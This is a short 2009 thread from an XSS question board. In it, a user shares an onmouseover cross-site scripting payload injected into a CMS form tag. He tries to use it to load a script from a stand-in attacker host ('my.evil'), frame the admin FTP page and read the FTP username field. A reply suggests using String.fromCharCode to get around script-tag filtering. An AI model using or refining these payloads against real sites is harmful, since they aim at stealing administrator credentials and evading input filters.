Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
onmouseover and external javascript?
Posted by: GaSmo
Date: October 26, 2009 04:07AM

Hi there,

still having problems with my xss in my cms.
Only can run an onmouseover - xss is in a form tag:

<form action="admin/index.php?menus" onmouseover=alert(23)" method="post" name="menu">
(works fine)
next step I think i have to go, is to document.write my XSS Payload.
But this dosn't work.

XSS-code:
" onmouseover="document.write('<script src=\"http://my.evil/xss.js\"><\/script>');"

xss.js-code:

document.write('<iframe src=\"admin/index.php?ftp\" name=\"ftpframe\"');
document.write('<script>alert(contentDocument.ftpframe.document.adminform.ftpuser.value)');


What's wrong with my idea?



Edited 1 time(s). Last edit at 10/26/2009 04:09AM by GaSmo.

Options: ReplyQuote
Re: onmouseover and external javascript?
Posted by: PaPPy
Date: October 26, 2009 07:37AM

when u use ur xss code, does any of it get filtered out?
what is the ouput html look like?

maybe they are filtering out ur <script> tags

try String.fromCharCode

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote


Sorry, only registered users may post in this forum.